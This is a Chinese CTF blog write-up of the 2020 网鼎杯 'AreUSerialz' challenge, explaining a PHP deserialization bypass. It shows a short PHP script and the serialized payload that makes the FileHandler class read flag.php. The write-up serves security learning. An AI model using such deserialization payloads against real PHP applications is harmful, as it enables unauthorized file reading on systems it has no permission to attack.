[网鼎杯 2020 青龙组]AreUSerialz 1

最新推荐文章于 2024-01-21 11:13:41 发布
最新推荐文章于 2024-01-21 11:13:41 发布
阅读量808 收藏 1
点赞数 1
分类专栏: CTF-WEB 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46196627/article/details/125219293
版权

[网鼎杯 2020 青龙组]AreUSerialz1

考察php反序列化
题目首先对传入的str进行条件判断,传入的值中不能用<chr(32)空格,不能>chr(125) } 反括号。
反序列化中 protect ,private, 在序列化时候存在不可见\0在ascii码中为0在实例化 序列化中均不可见在序列化时需要加上\0在浏览器中为%00
在这里插入图片描述
此时无法绕过is_valid字符限制函数。

查看大佬wp后 序列化pulic 来反序列protected

因为php7.1+版本对属性类型不敏感,本地序列化的时候将属性改为public

即:

<?php
class FileHandler {

    public $op=2;
    public $filename='flag.php';
    public $content='r';
}
$a = new FileHandler();
echo serialize($a);
?>

序列结果

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:1:"r";}
龙咯李
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020龙组Boom
05-12
2020龙组Boom。如果需要的可以下载,其实就是解方程而已,没啥难度。
[杯 2020 龙组]AreUSerialz1
陈艺秋的博客
07-05 674
如果 $str 经过 is_valid() 函数的检查,返回 true,则使用 unserialize() 函数对 $str 进行反序列化操作,并将结果赋值给变量 $obj。op,filename,$content三个变量权限都是protected,而protected权限的变量在序列化的时会有%00*%00字符,%00字符的ASCII码为0,就无法通过上面的is_valid函数校验。则将 $op 的值修改为 "1",并清空 $content,然后再次调用 process() 方法。
[杯 2020 龙组]AreUSerialz1详解两种常用方法及php伪协议扩展
最新发布
m0_73615178的博客
01-21 507
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
2020杯(龙组)--WEB--AreUSerialz(反序列化)
a965527596的博客
05-17 2306
AreUSerialz 1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。 <?php include("flag.php"); highlight_file(__FILE__);
[杯 2020 龙组]AreUSerialz(BUUCTF)
weixin_53150482的博客
07-17 416
[杯 2020 龙组]AreUSerialz(BUUCTF)
2020年龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
龙组18道.rar
06-11
2020龙组的题目压缩包,里面已经分好类了。
20200510.龙组.zip
06-10
2020 5 10 龙组 比赛题目 web没有附件 其他基本都有 , 感谢各位师傅的整理
2020龙组白虎组部分试题.rar
05-14
2020龙组白虎组部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次龙难度大于白虎。
2022年第三届“杯”络安全大赛(龙组)部分题目附件
09-19
2022年第三届“杯”络安全大赛(龙组)部分题目附件 2022年第三届“杯”络安全大赛(龙组)部分题目附件 2022年第三届“杯”络安全大赛(龙组)部分题目附件 2022年第三届“杯”络...
2020杯.zip
07-20
2020杯 逆向 pwn 密码 隐写赛题,除web外均有
杯2022白虎组题目分享
09-06
逆向,pwn,misc,加解密题目,杯2022,白虎组,ctf
【2020年第二届“杯”络安全大赛 龙组】Crypto boom
01-20
题目 原创文章 58获赞 99访问量 8393 关注 私信 展开阅读全文 作者:你们这样一点都不可耐
杯-第三场-逆向-最好的语言
08-28
2018年8月27日 杯|第三场|逆向------最好的语言~~~
CTF学习-WEB-PHP反序列化-[杯 2020 龙组]AreUSerialz 1
qq_43564182的博客
07-13 618
步骤思路 第一:获取flag存储flag.php 第二:两个魔术方法__destruct __construct 第三:传输str参数数据后触发destruct,存在is_valid过滤 第四:__destruct中会调用process,其中op=1写入及op=2读取 第五:涉及对象FileHandler,变量op及filename,content,进行构造输出** 解题 打开页发现如下代码: <?php include("flag.php"); highlight_file(__FILE__
序列化2之[杯 2020 龙组]AreUSerialz1
qq_58970968的博客
04-17 2234
class FileHandler { protected $op; protected $filename; protected $content; function __construct(){ $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hello World!"; $this->process(); } public .
[杯 2020 龙组]AreUSerialz
qq_52907838的博客
05-26 99
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hel.
允许外访问龙面板
10-10
要允许外访问龙面板,您需要进行以下操作: 1. 配置防火墙规则:确保服务器的防火墙允许外部访问面板的端口。默认情况下,龙面板使用的是5700端口,您可以根据自己的需要进行配置。 2. 配置面板监听地址:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值